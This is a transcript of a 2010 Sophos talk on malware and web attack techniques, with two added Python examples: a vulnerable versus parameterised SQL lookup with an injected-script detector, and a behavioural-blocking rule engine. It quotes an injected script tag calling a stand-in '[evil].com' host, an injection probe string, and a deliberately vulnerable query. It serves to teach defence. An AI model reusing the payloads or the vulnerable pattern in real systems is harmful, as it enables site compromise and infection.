Anatomy of an attack – ghosts in the machine
DESCRIPTION
Presentation "Anatomija napada – duhovi u mašini" (Anatomy of an attack – ghosts in the machine), given by Vanja Švajcer at the Sophos seminar in May 2010.
TRANSCRIPT
Vanja Svajcer
Principal Researcher – Sophos
Belgrade, 13 May 2010
Anatomy of an attack – ghosts in the machine
What does SophosLabs do?
Collects threats
Analyses and classifies them
Creates detections and removes threats
Publishes fresh definitions and information
Research and development
More on this later
SophosLabs at the very centre
Anatomy of an attack
Setting the scene
Malicious software (malware)
Attack techniques
The analysis process and tools
Protection technology
Types of malicious software
Virus
Trojan
Worm
Who used to write viruses?
There is no "standard" virus writer and no "standard" motive for writing one
Schoolchildren
High-school students
University students
IT professionals
Mostly men
Never A/V companies
Who writes malware today?
Viruses are rarely seen, but they seem to be becoming popular again
It is about money
At its core it comes down to crime
(And there is still the odd spotty teenager out there…)
APT
Advanced Persistent Threat
The modern term for "targeted malware"
Small size (around 100k) and special purpose
No packing
Looks like a legitimate Windows file
Unauthorised covert transfer of data (data exfiltration)
Hard to remove
Email threats
The second half of 2008 saw a dramatic rise in malware in the form of email attachments
In 2009 the trend continues, with several families spreading through aggressive mass spamming
The same old social engineering tactics
UPS/FedEx failed delivery reports, Microsoft patches, airline e-tickets etc.
Top spammed malware (2009)
Share of spammed malware by family:
Mal/Bredo-A – 15.9%
W32/MyDoom-O – 8.9%
Troj/Bredo-G – 8.5%
Troj/Invo-Zip – 5.8%
Troj/BredoZp-C – 5.4%
Troj/Agent-LGE – 4.8%
Mal/EncPk-KP – 4.7%
Mal/WaledPak-A – 3.5%
Mal/BredoZp-A – 3.3%
Mal/EncPk-JX – 3.2%
Other – 36.0%
A few key malware families dominate
Bredo
Waled
Simple, but it still works!
Social engineering – Bredo
Mal/Bredo
The same campaign can use numerous "different" attachments
Social engineering – Zbot (aka Zeus)
Mal/Zbot
Bredo vs Zbot
Competition between bots!!!
Bredo tries to disable any installed Zbot
Very much like the Netsky vs Bagle war of a few years ago!!!
Email threats
Global spam traps for tracking spam
The US relays more spam than any other single country
Compromised computers not only spread spam but also distribute malware and launch DDoS attacks
Share of relayed spam by country:
United States – 15%
Brazil – 11%
India – 5%
China – 5%
Republic of Korea – 5%
Turkey – 4%
Poland – 4%
Vietnam – 3%
Russian Federation – 3%
Spain – 3%
Other – 42%
The web dominates
99% of infected systems are legitimate, compromised sites
Attack sites
Botnet C&C over HTTP
Attacks still often start with spammed email
Attacks on Web 2.0 applications
Step 1: redirection from a compromised site
[Diagram: compromised web sites → attacker-controlled redirects → attack site using a bundle of exploits → payload]
Compromising hosts
SQL injection
Attackers use tools to identify pages potentially vulnerable to SQL injection
They send malicious HTTP requests (Demo)
[Diagram: malicious SQL injection requests reaching the web server's database]
SQL injection
SQL injection leaves the database peppered with malicious script tags
As a result, pages on the web server that are built from data pulled out of the database also contain the malicious script tags
<script src=http://[evil].com/file.js
SQL injection
The user browses the web site
The malicious script tag covertly loads a script from a remote server
The victim becomes infected with malware:
Asprox trojan
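Added example, not from the presentation, in Python with sqlite3: the lookup built by string concatenation that lets an attacker change the query, its parameterised counterpart, and an audit query that flags stored rows carrying a remote script tag, which is the symptom the slides describe. The products table, its rows and the `[evil].com` placeholder are constructed for the example.

```python
import re
import sqlite3

# Constructed sample data: one row already carries an injected remote script tag,
# the state an injection campaign leaves behind in a content table.
SAMPLE_ROWS = [
    ("Widget", "A fine widget"),
    ("Gadget", "A gadget<script src=http://[evil].com/file.js></script>"),
    ("Gizmo", "Plain description"),
]

# Remote script tag: <script ... src= followed by http://, https:// or //
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//", re.I)


def make_db():
    """Build an in-memory database holding the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (name TEXT, description TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?)", SAMPLE_ROWS)
    con.commit()
    return con


def vulnerable_lookup(con, name):
    """Deliberately vulnerable: user input is pasted into the SQL text itself."""
    sql = "SELECT name, description FROM products WHERE name = '" + name + "'"
    return con.execute(sql).fetchall()


def safe_lookup(con, name):
    """Parameterised query: the input is bound as data and is never parsed as SQL."""
    sql = "SELECT name, description FROM products WHERE name = ?"
    return con.execute(sql, (name,)).fetchall()


def find_injected_rows(con):
    """Audit stored content for remote script tags; returns (rowid, name) per hit."""
    hits = []
    for rowid, name, desc in con.execute("SELECT rowid, name, description FROM products"):
        if SCRIPT_TAG_RE.search(desc or ""):
            hits.append((rowid, name))
    return hits


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"  # classic quote-breaking input
    print("vulnerable:", len(vulnerable_lookup(db, probe)), "rows")  # whole table
    print("parameterised:", len(safe_lookup(db, probe)), "rows")     # nothing matches
    print("rows with injected script tags:", find_injected_rows(db))
```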
Demo: SQLi + XSS
Newly discovered infected pages – April 2010
Blackhat SEO
Compromised hosts seeded with SEO kits
They boost the page's ranking
SEO poisoning
Searching for popular terms
Blackhat SEO
Demo: Blackhat SEO
Visibility – sites hosting SEO kits
Step 3: Fetching content from the attacker's site
[Diagram: compromised web sites → attacker-controlled redirects → attack site using several combined vulnerabilities → payload]
Web attacks
Built using purchased toolkits
MPack, IcePack, GPack, Neosploit, Eleonore, Yes
Management console
Phishing
Detected: 19 October 2009
Most affected countries:
France – 4%
USA – 17%
Great Britain – 3%
Germany – 6%
Web attacks
Breakdown by web browser!
Server-side polymorphism
Percentage affected:
MSIE – 12%
FireFox – 1%
Opera – 5%
Polymorphism
Weaknesses of polymorphic malware
The poly-engine is part of the code
It can be reverse-engineered by a persistent researcher
It must be decrypted in memory
Emulate the program code until the real variant emerges
Detection can be based on the decryption procedure
Server-side polymorphism
Demo: SSP
Step 4: Attack the victims through vulnerabilities and infect them
[Diagram: compromised web sites → attacker-controlled redirects → attack site using several combined vulnerabilities → payload]
Fake AV professionalism
Video: scareware
Troj/MacSwp
Zeus (Zbot)
A kit for building botnets and information-stealing malware
Builder
Loader
Control panel
Demo: Zbot
Zeus (Zbot) – tracker
Rootkits
Programs that use various techniques to hide their presence on a computer
Trojans
Legitimate programs?
What do rootkits do?
[Diagram: the anti-virus scanner requests a file listing from the operating system; the rootkit sits between the two and filters the listing. Files shown: Memo.doc, Sales.xls, Phish.exe, Sophos.ppt]
Demo: rootkit
Top-tier rootkits
TDSS (TDL3)
MS10-015 update
Top-tier rootkits – Sinowal (Mebroot)
Infects the MBR (like the old boot sector viruses)
Modifies the OS loader so that it loads a malicious driver
The driver hides the malicious MBR (stealth)
Installs a custom network stack
Contains a backdoor (encrypted HTTP communication)
Payload – injects malicious DLLs
Pseudo-random generation of update URLs (daily)
Rootkits – Sinowal (Mebroot)
[Diagram: boot sequence from the hard disk – BIOS initialization (CPU real mode, BIOS services) → MBR → boot loader → early kernel initialization → kernel initialization (CPU protected mode) → user processes and Windows services. The Sinowal dropper runs as a user process, and endpoint security, also a user process, reads the MBR]
Sinowal geographic spread (Sinowal, Feb–Mar 2010)
Top-tier rootkits of the future
Virtualisation rootkits
Software-based (SubVirt)
Hardware-assisted (Blue Pill, Vitriol)
Bootkits (eEye, vBootkit, Stoned)
SMM-based rootkits
BIOS/EFI-based rootkits?
Virtualisation rootkits
[Diagram: hardware at the bottom, the virtualisation rootkit acting as the VMM above it, and the OS, guest OSg1 and guest OSg2 with applications 1 and 2 running on top]
Virtualisation rootkits
[Diagram: hardware; virtualisation rootkit – a malicious hypervisor; Domain 0, OSg1, OSg2 and OSg3 running above it]
SophosLabs™
Overview
SophosLabs systems
Demo: lab systems
Protection technology
Content inspection (classic scanning)
Behaviour-based detection (HIPS)
Reputation
Domain
File
Life cycle of a malware family
[Diagram: first member of the family → analysis → detection → test → release → next member of the family]
Family characteristics
Identical core functionality
New variants may have additional functionality
Lines of code are reused
After recompilation, the new variant is binary-different
Traditional scanning is not effective for proactive detection of the family
Analysis at the functional level is required
Graphical representation of application requests
Packed -> Unpacked
"Runtime behavioral" protection
Complements Behavioral Genotype
Checks the behaviour of processes as applied to the system
Checks all running processes for signs of malicious modification of system objects
Files
Registry entries
Processes
Network connections
Loaded drivers
Registration in the run key
Simplified runtime architecture
Privileged – kernel mode
Non-privileged – user mode
- Process virus.exe is starting...
- Hmmm, OK. Scanning for viruses…
- Nothing found.
- Virus.exe opens the registry run key...
- Interesting. Tell me more about that.
- Virus.exe registers itself in the run key…
- Hmmm, no, that is not OK. Block the operation!!!
- Operation blocked.
- Thank you, kernel!
- Reporting the behaviour.
Virus.exe
Buffer overflow protection
Generic technology for detecting exploitation of vulnerabilities (including so-called zero-day exploits)
Complements Windows DEP
Detects various buffer overflow attacks
Stack
Heap
Return to libc
Protects Microsoft and non-Microsoft processes, mainly on the client side
Buffer overflow – simplified architecture
- Downloading a file…
- Interesting, where are you coming from?
- Internet Explorer program code.
- OK.
- Downloading file2...
- Oh, not again. Where are you coming from?
- The stack.
- Oh no. Buffer overflow detected!!!
- Suspending the process.
- Reporting the behaviour.
Iexplore.exe
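Added example, not Sophos code, in Python: a small rule engine that walks the two dialogues above, the run-key registration by virus.exe and the download issued from the stack by iexplore.exe, and produces the block/suspend verdicts and the report the kernel-side component would hand back. The event stream, the event fields (including the `origin` of the call) and the process names are constructed for the example; the Run key path is the real Windows autostart key.

```python
from dataclasses import dataclass

# Windows autostart key; a value written here survives reboot (persistence).
RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"


@dataclass
class Event:
    """One operation reported from kernel mode (constructed shape for this example)."""
    process: str
    op: str             # "start", "reg_open", "reg_set", "download"
    target: str = ""    # registry path or URL
    origin: str = "code"  # memory region the call was issued from: "code" or "stack"


@dataclass
class Verdict:
    action: str         # "allow", "block" or "suspend"
    reason: str = ""


def run_key_rule(ev):
    """Writing a value under the Run key is self-registration for autostart: block it."""
    if ev.op == "reg_set" and ev.target.lower().startswith(RUN_KEY.lower()):
        return Verdict("block", f"{ev.process} registers itself in the run key")
    return None


def stack_origin_rule(ev):
    """A download issued from the stack has no legitimate caller: suspend the process."""
    if ev.op == "download" and ev.origin == "stack":
        return Verdict("suspend", f"buffer overflow suspected in {ev.process}")
    return None


RULES = [run_key_rule, stack_origin_rule]


def evaluate(events):
    """Return (process, op, action, reason) per event; a suspended process stays suspended."""
    suspended = set()
    report = []
    for ev in events:
        if ev.process in suspended:
            report.append((ev.process, ev.op, "suspend", "process already suspended"))
            continue
        verdict = Verdict("allow")
        for rule in RULES:
            hit = rule(ev)
            if hit:
                verdict = hit
                break
        if verdict.action == "suspend":
            suspended.add(ev.process)
        report.append((ev.process, ev.op, verdict.action, verdict.reason))
    return report


# Constructed event stream following the two slide dialogues.
SAMPLE_EVENTS = [
    Event("virus.exe", "start"),
    Event("virus.exe", "reg_open", RUN_KEY),
    Event("virus.exe", "reg_set", RUN_KEY + r"\virus"),
    Event("iexplore.exe", "download", "http://example.invalid/file1"),
    Event("iexplore.exe", "download", "http://example.invalid/file2", origin="stack"),
    Event("iexplore.exe", "download", "http://example.invalid/file3"),
]

if __name__ == "__main__":
    for line in evaluate(SAMPLE_EVENTS):
        print(line)
```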
Cloud computing
Cloud protection
Real-time lookups
Real-time feedback (community protection)
Security-related social networking
Bridging gaps in protection
Improving response time
Proactive vs reactive
Conclusion
Malware is becoming ever more complex
Financial motivation
Targeted malware can pose a challenge
The security community is not losing the battle
New methods are constantly being developed
Technology is not a "silver bullet"
Blog: http://www.sophos.com/blogs/sophoslabs
Twitter: http://twitter.com/sophoslabs
Questions?